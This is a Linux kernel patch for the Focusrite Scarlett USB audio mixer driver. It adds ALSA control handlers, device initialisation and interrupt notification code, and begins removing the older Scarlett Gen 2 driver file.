++static int scarlett2_meter_ctl_get(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	u16 meter_levels[SCARLETT2_MAX_METERS];
++	int i, err;
++
++	err = scarlett2_usb_get_meter_levels(elem->head.mixer, elem->channels,
++					     meter_levels);
++	if (err < 0)
++		return err;
++
++	for (i = 0; i < elem->channels; i++)
++		ucontrol->value.integer.value[i] = meter_levels[i];
++
++	return 0;
++}
++
++static const struct snd_kcontrol_new scarlett2_meter_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_PCM,
++	.access = SNDRV_CTL_ELEM_ACCESS_READ | SNDRV_CTL_ELEM_ACCESS_VOLATILE,
++	.name = "",
++	.info = scarlett2_meter_ctl_info,
++	.get  = scarlett2_meter_ctl_get
++};
++
++static int scarlett2_add_meter_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	/* devices without a mixer also don't support reporting levels */
++	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	return scarlett2_add_new_ctl(mixer, &scarlett2_meter_ctl,
++				     0, private->num_mux_dsts,
++				     "Level Meter", NULL);
++}
++
++/*** MSD Controls ***/
++
++static int scarlett2_msd_ctl_get(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->msd_switch;
++	return 0;
++}
++
++static int scarlett2_msd_ctl_put(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->msd_switch;
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->msd_switch = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MSD_SWITCH,
++				       0, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_msd_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_msd_ctl_get,
++	.put  = scarlett2_msd_ctl_put,
++};
++
++static int scarlett2_add_msd_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	if (!info->has_msd_mode)
++		return 0;
++
++	/* If MSD mode is off, hide the switch by default
++	 * (unless overridden via the SCARLETT2_MSD_ENABLE setup flag)
++	 */
++	if (!private->msd_switch && !(mixer->chip->setup & SCARLETT2_MSD_ENABLE))
++		return 0;
++
++	/* Add MSD control */
++	return scarlett2_add_new_ctl(mixer, &scarlett2_msd_ctl,
++				     0, 1, "MSD Mode Switch", NULL);
++}
++
++/*** Standalone Control ***/
++
++static int scarlett2_standalone_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->standalone_switch;
++	return 0;
++}
++
++static int scarlett2_standalone_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->standalone_switch;
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->standalone_switch = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer,
++				       SCARLETT2_CONFIG_STANDALONE_SWITCH,
++				       0, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_standalone_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_standalone_ctl_get,
++	.put  = scarlett2_standalone_ctl_put,
++};
++
++static int scarlett2_add_standalone_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	/* Add standalone control */
++	return scarlett2_add_new_ctl(mixer, &scarlett2_standalone_ctl,
++				     0, 1, "Standalone Switch", NULL);
++}
++
++/*** Cleanup/Suspend Callbacks ***/
++
++static void scarlett2_private_free(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	cancel_delayed_work_sync(&private->work);
++	kfree(private);
++	mixer->private_data = NULL;
++}
++
++static void scarlett2_private_suspend(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	if (cancel_delayed_work_sync(&private->work))
++		scarlett2_config_save(private->mixer);
++}
++
++/*** Initialisation ***/
++
++static void scarlett2_count_mux_io(struct scarlett2_data *private)
++{
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int port_type, srcs = 0, dsts = 0;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		srcs += port_count[port_type][SCARLETT2_PORT_IN];
++		dsts += port_count[port_type][SCARLETT2_PORT_OUT];
++	}
++
++	private->num_mux_srcs = srcs;
++	private->num_mux_dsts = dsts;
++}
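++
++/* For example, a device with port counts (in/out) of NONE 1/0,
++ * ANALOGUE 4/4, S/PDIF 2/2, MIX 10/18, and PCM 6/6 (the 6i6 Gen 2)
++ * ends up with num_mux_srcs = 1 + 4 + 2 + 10 + 6 = 23 and
++ * num_mux_dsts = 0 + 4 + 2 + 18 + 6 = 30.
++ */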
++
++/* Look through the interface descriptors for the Focusrite Control
++ * interface (bInterfaceClass = 255 Vendor Specific Class) and set
++ * bInterfaceNumber, bEndpointAddress, wMaxPacketSize, and bInterval
++ * in private
++ */
++static int scarlett2_find_fc_interface(struct usb_device *dev,
++				       struct scarlett2_data *private)
++{
++	struct usb_host_config *config = dev->actconfig;
++	int i;
++
++	for (i = 0; i < config->desc.bNumInterfaces; i++) {
++		struct usb_interface *intf = config->interface[i];
++		struct usb_interface_descriptor *desc =
++			&intf->altsetting[0].desc;
++		struct usb_endpoint_descriptor *epd;
++
++		if (desc->bInterfaceClass != 255)
++			continue;
++
++		epd = get_endpoint(intf->altsetting, 0);
++		private->bInterfaceNumber = desc->bInterfaceNumber;
++		private->bEndpointAddress = epd->bEndpointAddress &
++			USB_ENDPOINT_NUMBER_MASK;
++		private->wMaxPacketSize = le16_to_cpu(epd->wMaxPacketSize);
++		private->bInterval = epd->bInterval;
++		return 0;
++	}
++
++	return -EINVAL;
++}
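++
++/* Note: the endpoint direction bit is masked off above with
++ * USB_ENDPOINT_NUMBER_MASK; scarlett2_init_notify() below rebuilds a
++ * full IN pipe from the bare endpoint number with usb_rcvintpipe().
++ */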
++
++/* Initialise private data */
++static int scarlett2_init_private(struct usb_mixer_interface *mixer,
++				  const struct scarlett2_device_entry *entry)
++{
++	struct scarlett2_data *private =
++		kzalloc(sizeof(struct scarlett2_data), GFP_KERNEL);
++
++	if (!private)
++		return -ENOMEM;
++
++	mutex_init(&private->usb_mutex);
++	mutex_init(&private->data_mutex);
++	INIT_DELAYED_WORK(&private->work, scarlett2_config_save_work);
++
++	mixer->private_data = private;
++	mixer->private_free = scarlett2_private_free;
++	mixer->private_suspend = scarlett2_private_suspend;
++
++	private->info = entry->info;
++	private->series_name = entry->series_name;
++	scarlett2_count_mux_io(private);
++	private->scarlett2_seq = 0;
++	private->mixer = mixer;
++
++	return scarlett2_find_fc_interface(mixer->chip->dev, private);
++}
++
++/* Cargo cult proprietary initialisation sequence */
++static int scarlett2_usb_init(struct usb_mixer_interface *mixer)
++{
++	struct usb_device *dev = mixer->chip->dev;
++	struct scarlett2_data *private = mixer->private_data;
++	u8 buf[24];
++	int err;
++
++	if (usb_pipe_type_check(dev, usb_sndctrlpipe(dev, 0)))
++		return -EINVAL;
++
++	/* step 0 */
++	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
++			       SCARLETT2_USB_CMD_INIT, buf, sizeof(buf));
++	if (err < 0)
++		return err;
++
++	/* step 1 */
++	private->scarlett2_seq = 1;
++	err = scarlett2_usb(mixer, SCARLETT2_USB_INIT_1, NULL, 0, NULL, 0);
++	if (err < 0)
++		return err;
++
++	/* step 2 */
++	private->scarlett2_seq = 1;
++	return scarlett2_usb(mixer, SCARLETT2_USB_INIT_2, NULL, 0, NULL, 84);
++}
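++
++/* Note: scarlett2_seq is set to 1 before each init step, so these
++ * requests go out with seq = 1; the device answers them with seq = 0,
++ * which the response validation in scarlett2_usb() special-cases.
++ */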
++
++/* Read configuration from the interface on start */
++static int scarlett2_read_configs(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int num_mixer_out =
++		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++	struct scarlett2_usb_volume_status volume_status;
++	int err, i;
++
++	if (info->has_msd_mode) {
++		err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_MSD_SWITCH,
++			1, &private->msd_switch);
++		if (err < 0)
++			return err;
++
++		/* no other controls are created if MSD mode is on */
++		if (private->msd_switch)
++			return 0;
++	}
++
++	err = scarlett2_update_input_other(mixer);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_update_monitor_other(mixer);
++	if (err < 0)
++		return err;
++
++	/* the rest of the configuration is for devices with a mixer */
++	if (info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	err = scarlett2_usb_get_config(
++		mixer, SCARLETT2_CONFIG_STANDALONE_SWITCH,
++		1, &private->standalone_switch);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_update_sync(mixer);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
++	if (err < 0)
++		return err;
++
++	if (info->line_out_hw_vol)
++		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
++			private->dim_mute[i] = !!volume_status.dim_mute[i];
++
++	private->master_vol = clamp(
++		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
++		0, SCARLETT2_VOLUME_BIAS);
++
++	for (i = 0; i < num_line_out; i++) {
++		int volume, mute;
++
++		private->vol_sw_hw_switch[i] =
++			info->line_out_hw_vol
++				&& volume_status.sw_hw_switch[i];
++
++		volume = private->vol_sw_hw_switch[i]
++			   ? volume_status.master_vol
++			   : volume_status.sw_vol[i];
++		volume = clamp(volume + SCARLETT2_VOLUME_BIAS,
++			       0, SCARLETT2_VOLUME_BIAS);
++		private->vol[i] = volume;
++
++		mute = private->vol_sw_hw_switch[i]
++			 ? private->dim_mute[SCARLETT2_BUTTON_MUTE]
++			 : volume_status.mute_switch[i];
++		private->mute_switch[i] = mute;
++	}
++
++	for (i = 0; i < num_mixer_out; i++) {
++		err = scarlett2_usb_get_mix(mixer, i);
++		if (err < 0)
++			return err;
++	}
++
++	return scarlett2_usb_get_mux(mixer);
++}
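++
++/* Worked example of the SCARLETT2_VOLUME_BIAS mapping used above:
++ * with a bias of 127, a raw volume reading of -20 is stored as
++ * clamp(-20 + 127, 0, 127) = 107, keeping the ALSA control value
++ * non-negative.
++ */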
++
++/* Notify on sync change */
++static void scarlett2_notify_sync(
++	struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	private->sync_updated = 1;
++
++	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
++		       &private->sync_ctl->id);
++}
++
++/* Notify on monitor change */
++static void scarlett2_notify_monitor(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int i;
++
++	/* if line_out_hw_vol is 0, there are no controls to update */
++	if (!info->line_out_hw_vol)
++		return;
++
++	private->vol_updated = 1;
++
++	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
++		       &private->master_vol_ctl->id);
++
++	for (i = 0; i < num_line_out; i++)
++		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
++			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++				       &private->vol_ctls[i]->id);
++}
++
++/* Notify on dim/mute change */
++static void scarlett2_notify_dim_mute(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int i;
++
++	private->vol_updated = 1;
++
++	if (!info->line_out_hw_vol)
++		return;
++
++	for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->dim_mute_ctls[i]->id);
++
++	for (i = 0; i < num_line_out; i++)
++		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
++			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++				       &private->mute_ctls[i]->id);
++}
++
++/* Notify on "input other" change (level/pad/air) */
++static void scarlett2_notify_input_other(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	int i;
++
++	private->input_other_updated = 1;
++
++	for (i = 0; i < info->level_input_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->level_ctls[i]->id);
++	for (i = 0; i < info->pad_input_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->pad_ctls[i]->id);
++	for (i = 0; i < info->air_input_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->air_ctls[i]->id);
++	for (i = 0; i < info->phantom_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->phantom_ctls[i]->id);
++}
++
++/* Notify on "monitor other" change (direct monitor, speaker
++ * switching, talkback)
++ */
++static void scarlett2_notify_monitor_other(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	private->monitor_other_updated = 1;
++
++	if (info->direct_monitor) {
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->direct_monitor_ctl->id);
++		return;
++	}
++
++	if (info->has_speaker_switching)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->speaker_switching_ctl->id);
++
++	if (info->has_talkback)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->talkback_ctl->id);
++
++	/* if speaker switching was recently enabled or disabled,
++	 * invalidate the dim/mute and mux enum controls
++	 */
++	if (private->speaker_switching_switched) {
++		int i;
++
++		scarlett2_notify_dim_mute(mixer);
++
++		private->speaker_switching_switched = 0;
++		private->mux_updated = 1;
++
++		for (i = 0; i < private->num_mux_dsts; i++)
++			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++				       &private->mux_ctls[i]->id);
++	}
++}
++
++/* Interrupt callback */
++static void scarlett2_notify(struct urb *urb)
++{
++	struct usb_mixer_interface *mixer = urb->context;
++	int len = urb->actual_length;
++	int ustatus = urb->status;
++	u32 data;
++
++	if (ustatus != 0 || len != 8)
++		goto requeue;
++
++	data = le32_to_cpu(*(__le32 *)urb->transfer_buffer);
++	if (data & SCARLETT2_USB_NOTIFY_SYNC)
++		scarlett2_notify_sync(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_MONITOR)
++		scarlett2_notify_monitor(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_DIM_MUTE)
++		scarlett2_notify_dim_mute(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_INPUT_OTHER)
++		scarlett2_notify_input_other(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_MONITOR_OTHER)
++		scarlett2_notify_monitor_other(mixer);
++
++requeue:
++	if (ustatus != -ENOENT &&
++	    ustatus != -ECONNRESET &&
++	    ustatus != -ESHUTDOWN) {
++		urb->dev = mixer->chip->dev;
++		usb_submit_urb(urb, GFP_ATOMIC);
++	}
++}
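++
++/* For example, a notification word of 0x00600000 has both
++ * SCARLETT2_USB_NOTIFY_DIM_MUTE (0x00200000) and
++ * SCARLETT2_USB_NOTIFY_MONITOR (0x00400000) set, so both handlers
++ * run for that one interrupt packet.
++ */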
++
++static int scarlett2_init_notify(struct usb_mixer_interface *mixer)
++{
++	struct usb_device *dev = mixer->chip->dev;
++	struct scarlett2_data *private = mixer->private_data;
++	unsigned int pipe = usb_rcvintpipe(dev, private->bEndpointAddress);
++	void *transfer_buffer;
++
++	if (mixer->urb) {
++		usb_audio_err(mixer->chip,
++			      "%s: mixer urb already in use!\n", __func__);
++		return 0;
++	}
++
++	if (usb_pipe_type_check(dev, pipe))
++		return -EINVAL;
++
++	mixer->urb = usb_alloc_urb(0, GFP_KERNEL);
++	if (!mixer->urb)
++		return -ENOMEM;
++
++	transfer_buffer = kmalloc(private->wMaxPacketSize, GFP_KERNEL);
++	if (!transfer_buffer)
++		return -ENOMEM;
++
++	usb_fill_int_urb(mixer->urb, dev, pipe,
++			 transfer_buffer, private->wMaxPacketSize,
++			 scarlett2_notify, mixer, private->bInterval);
++
++	return usb_submit_urb(mixer->urb, GFP_KERNEL);
++}
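++
++/* Note: this interrupt URB is polled at the bInterval found on the
++ * vendor-specific interface's endpoint; scarlett2_notify() requeues
++ * it after each completion unless the status shows the URB was
++ * unlinked (-ENOENT, -ECONNRESET, or -ESHUTDOWN).
++ */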
++
++static const struct scarlett2_device_entry *get_scarlett2_device_entry(
++	struct usb_mixer_interface *mixer)
++{
++	const struct scarlett2_device_entry *entry = scarlett2_devices;
++
++	/* Find entry in scarlett2_devices */
++	while (entry->usb_id && entry->usb_id != mixer->chip->usb_id)
++		entry++;
++	if (!entry->usb_id)
++		return NULL;
++
++	return entry;
++}
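++
++/* Note: the loop above relies on scarlett2_devices[] ending with a
++ * sentinel entry whose usb_id is 0.
++ */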
++
++static int snd_scarlett2_controls_create(
++	struct usb_mixer_interface *mixer,
++	const struct scarlett2_device_entry *entry)
++{
++	int err;
++
++	/* Initialise private data */
++	err = scarlett2_init_private(mixer, entry);
++	if (err < 0)
++		return err;
++
++	/* Send proprietary USB initialisation sequence */
++	err = scarlett2_usb_init(mixer);
++	if (err < 0)
++		return err;
++
++	/* Read volume levels and controls from the interface */
++	err = scarlett2_read_configs(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the MSD control */
++	err = scarlett2_add_msd_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* If MSD mode is enabled, don't create any other controls */
++	if (((struct scarlett2_data *)mixer->private_data)->msd_switch)
++		return 0;
++
++	/* Create the analogue output controls */
++	err = scarlett2_add_line_out_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the analogue input controls */
++	err = scarlett2_add_line_in_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the input, output, and mixer mux input selections */
++	err = scarlett2_add_mux_enums(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the matrix mixer controls */
++	err = scarlett2_add_mixer_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the level meter controls */
++	err = scarlett2_add_meter_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the sync control */
++	err = scarlett2_add_sync_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the direct monitor control */
++	err = scarlett2_add_direct_monitor_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the speaker switching control */
++	err = scarlett2_add_speaker_switch_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the talkback controls */
++	err = scarlett2_add_talkback_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the standalone control */
++	err = scarlett2_add_standalone_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Set up the interrupt polling */
++	err = scarlett2_init_notify(mixer);
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++
++int snd_scarlett2_init(struct usb_mixer_interface *mixer)
++{
++	struct snd_usb_audio *chip = mixer->chip;
++	const struct scarlett2_device_entry *entry;
++	int err;
++
++	/* only use UAC_VERSION_2 */
++	if (!mixer->protocol)
++		return 0;
++
++	/* find entry in scarlett2_devices */
++	entry = get_scarlett2_device_entry(mixer);
++	if (!entry) {
++		usb_audio_err(mixer->chip,
++			      "%s: missing device entry for %04x:%04x\n",
++			      __func__,
++			      USB_ID_VENDOR(chip->usb_id),
++			      USB_ID_PRODUCT(chip->usb_id));
++		return 0;
++	}
++
++	if (chip->setup & SCARLETT2_DISABLE) {
++		usb_audio_info(chip,
++			"Focusrite %s Mixer Driver disabled "
++			"by modprobe options (snd_usb_audio "
++			"vid=0x%04x pid=0x%04x device_setup=%d)\n",
++			entry->series_name,
++			USB_ID_VENDOR(chip->usb_id),
++			USB_ID_PRODUCT(chip->usb_id),
++			SCARLETT2_DISABLE);
++		return 0;
++	}
++
++	usb_audio_info(chip,
++		"Focusrite %s Mixer Driver enabled (pid=0x%04x); "
++		"report any issues to g@b4.vu",
++		entry->series_name,
++		USB_ID_PRODUCT(chip->usb_id));
++
++	err = snd_scarlett2_controls_create(mixer, entry);
++	if (err < 0)
++		usb_audio_err(mixer->chip,
++			      "Error initialising %s Mixer Driver: %d",
++			      entry->series_name,
++			      err);
++
++	return err;
++}
+diff --git a/sound/usb/mixer_scarlett2.h b/sound/usb/mixer_scarlett2.h
+new file mode 100644
+index 0000000000000..d209362cf41a6
+--- /dev/null
++++ b/sound/usb/mixer_scarlett2.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __USB_MIXER_SCARLETT2_H
++#define __USB_MIXER_SCARLETT2_H
++
++int snd_scarlett2_init(struct usb_mixer_interface *mixer);
++
++#endif /* __USB_MIXER_SCARLETT2_H */
+diff --git a/sound/usb/mixer_scarlett_gen2.c b/sound/usb/mixer_scarlett_gen2.c
+deleted file mode 100644
+index 1bcb05c73e0ad..0000000000000
+--- a/sound/usb/mixer_scarlett_gen2.c
++++ /dev/null
+@@ -1,4274 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *   Focusrite Scarlett Gen 2/3 and Clarett+ Driver for ALSA
+- *
+- *   Supported models:
+- *   - 6i6/18i8/18i20 Gen 2
+- *   - Solo/2i2/4i4/8i6/18i8/18i20 Gen 3
+- *   - Clarett+ 8Pre
+- *
+- *   Copyright (c) 2018-2022 by Geoffrey D. Bennett <g at b4.vu>
+- *   Copyright (c) 2020-2021 by Vladimir Sadovnikov <sadko4u@gmail.com>
+- *   Copyright (c) 2022 by Christian Colglazier <christian@cacolglazier.com>
+- *
+- *   Based on the Scarlett (Gen 1) Driver for ALSA:
+- *
+- *   Copyright (c) 2013 by Tobias Hoffmann
+- *   Copyright (c) 2013 by Robin Gareus <robin at gareus.org>
+- *   Copyright (c) 2002 by Takashi Iwai <tiwai at suse.de>
+- *   Copyright (c) 2014 by Chris J Arges <chris.j.arges at canonical.com>
+- *
+- *   Much code borrowed from audio.c by
+- *     Alan Cox (alan at lxorguk.ukuu.org.uk)
+- *     Thomas Sailer (sailer at ife.ee.ethz.ch)
+- *
+- *   Code cleanup:
+- *   David Henningsson <david.henningsson at canonical.com>
+- */
+-
+-/* The protocol was reverse engineered by looking at the communication
+- * between Focusrite Control 2.3.4 and the Focusrite(R) Scarlett 18i20
+- * (firmware 1083) using usbmon in July-August 2018.
+- *
+- * Scarlett 18i8 support added in April 2019.
+- *
+- * Scarlett 6i6 support added in June 2019 (thanks to Martin Wittmann
+- * for providing usbmon output and testing).
+- *
+- * Scarlett 4i4/8i6 Gen 3 support added in May 2020 (thanks to Laurent
+- * Debricon for donating a 4i4 and to Fredrik Unger for providing 8i6
+- * usbmon output and testing).
+- *
+- * Scarlett 18i8/18i20 Gen 3 support added in June 2020 (thanks to
+- * Darren Jaeckel, Alex Sedlack, and Clovis Lunel for providing usbmon
+- * output, protocol traces and testing).
+- *
+- * Support for loading mixer volume and mux configuration from the
+- * interface during driver initialisation added in May 2021 (thanks to
+- * Vladimir Sadovnikov for figuring out how).
+- *
+- * Support for Solo/2i2 Gen 3 added in May 2021 (thanks to Alexander
+- * Vorona for 2i2 protocol traces).
+- *
+- * Support for phantom power, direct monitoring, speaker switching,
+- * and talkback added in May-June 2021.
+- *
+- * Support for Clarett+ 8Pre added in Aug 2022 by Christian
+- * Colglazier.
+- *
+- * This ALSA mixer gives access to (model-dependent):
+- *  - input, output, mixer-matrix muxes
+- *  - mixer-matrix gain stages
+- *  - gain/volume/mute controls
+- *  - level meters
+- *  - line/inst level, pad, and air controls
+- *  - phantom power, direct monitor, speaker switching, and talkback
+- *    controls
+- *  - disable/enable MSD mode
+- *  - disable/enable standalone mode
+- *
+- * <ditaa>
+- *    /--------------\    18chn            20chn     /--------------\
+- *    | Hardware  in +--+------\    /-------------+--+ ALSA PCM out |
+- *    \--------------/  |      |    |             |  \--------------/
+- *                      |      |    |    /-----\  |
+- *                      |      |    |    |     |  |
+- *                      |      v    v    v     |  |
+- *                      |   +---------------+  |  |
+- *                      |    \ Matrix  Mux /   |  |
+- *                      |     +-----+-----+    |  |
+- *                      |           |          |  |
+- *                      |           |18chn     |  |
+- *                      |           |          |  |
+- *                      |           |     10chn|  |
+- *                      |           v          |  |
+- *                      |     +------------+   |  |
+- *                      |     | Mixer      |   |  |
+- *                      |     |     Matrix |   |  |
+- *                      |     |            |   |  |
+- *                      |     | 18x10 Gain |   |  |
+- *                      |     |   stages   |   |  |
+- *                      |     +-----+------+   |  |
+- *                      |           |          |  |
+- *                      |18chn      |10chn     |  |20chn
+- *                      |           |          |  |
+- *                      |           +----------/  |
+- *                      |           |             |
+- *                      v           v             v
+- *                      ===========================
+- *               +---------------+       +---------------+
+- *                \ Output  Mux /         \ Capture Mux /
+- *                 +---+---+---+           +-----+-----+
+- *                     |   |                     |
+- *                10chn|   |                     |18chn
+- *                     |   |                     |
+- *  /--------------\   |   |                     |   /--------------\
+- *  | S/PDIF, ADAT |<--/   |10chn                \-->| ALSA PCM in  |
+- *  | Hardware out |       |                         \--------------/
+- *  \--------------/       |
+- *                         v
+- *                  +-------------+    Software gain per channel.
+- *                  | Master Gain |<-- 18i20 only: Switch per channel
+- *                  +------+------+    to select HW or SW gain control.
+- *                         |
+- *                         |10chn
+- *  /--------------\       |
+- *  | Analogue     |<------/
+- *  | Hardware out |
+- *  \--------------/
+- * </ditaa>
+- *
+- * Gen 3 devices have a Mass Storage Device (MSD) mode where a small
+- * disk with registration and driver download information is presented
+- * to the host. To access the full functionality of the device without
+- * proprietary software, MSD mode can be disabled by:
+- * - holding down the 48V button for five seconds while powering on
+- *   the device, or
+- * - using this driver and alsamixer to change the "MSD Mode" setting
+- *   to Off and power-cycling the device
+- */
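+-
+-/* For example (the card number and exact invocation here are only
+- * illustrative), MSD mode can be turned off from userspace with
+- * something like:
+- *   amixer -c 1 cset name='MSD Mode Switch' 0
+- * followed by power-cycling the device.
+- */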
+-
+-#include <linux/slab.h>
+-#include <linux/usb.h>
+-#include <linux/moduleparam.h>
+-
+-#include <sound/control.h>
+-#include <sound/tlv.h>
+-
+-#include "usbaudio.h"
+-#include "mixer.h"
+-#include "helper.h"
+-
+-#include "mixer_scarlett_gen2.h"
+-
+-/* device_setup value to enable */
+-#define SCARLETT2_ENABLE 0x01
+-
+-/* device_setup value to allow turning MSD mode back on */
+-#define SCARLETT2_MSD_ENABLE 0x02
+-
+-/* some gui mixers can't handle negative ctl values */
+-#define SCARLETT2_VOLUME_BIAS 127
+-
+-/* mixer range from -80dB to +6dB in 0.5dB steps */
+-#define SCARLETT2_MIXER_MIN_DB -80
+-#define SCARLETT2_MIXER_BIAS (-SCARLETT2_MIXER_MIN_DB * 2)
+-#define SCARLETT2_MIXER_MAX_DB 6
+-#define SCARLETT2_MIXER_MAX_VALUE \
+-	((SCARLETT2_MIXER_MAX_DB - SCARLETT2_MIXER_MIN_DB) * 2)
+-#define SCARLETT2_MIXER_VALUE_COUNT (SCARLETT2_MIXER_MAX_VALUE + 1)
+-
+-/* map from (dB + 80) * 2 to mixer value
